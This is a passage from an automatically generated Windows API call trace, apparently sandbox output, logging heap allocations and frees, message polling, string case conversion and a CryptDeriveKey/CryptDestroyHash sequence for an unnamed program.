wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.010] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0123.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.010] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0123.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0123.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa2d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0123.010] CryptDeriveKey (in: hProv=0x9beab0, Algid=0x6601, hBaseData=0x9a4300, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a43c0) returned 1 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0123.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0123.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0123.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0123.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0123.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0123.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0123.013] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.013] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0123.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0123.014] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.014] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0123.014] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0123.014] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0123.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0123.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f70a0 [0123.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0123.015] CryptDestroyHash (hHash=0x9a4300) returned 1 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0123.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0123.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0123.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0123.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0123.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0123.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0123.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0123.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69be0 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0123.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: 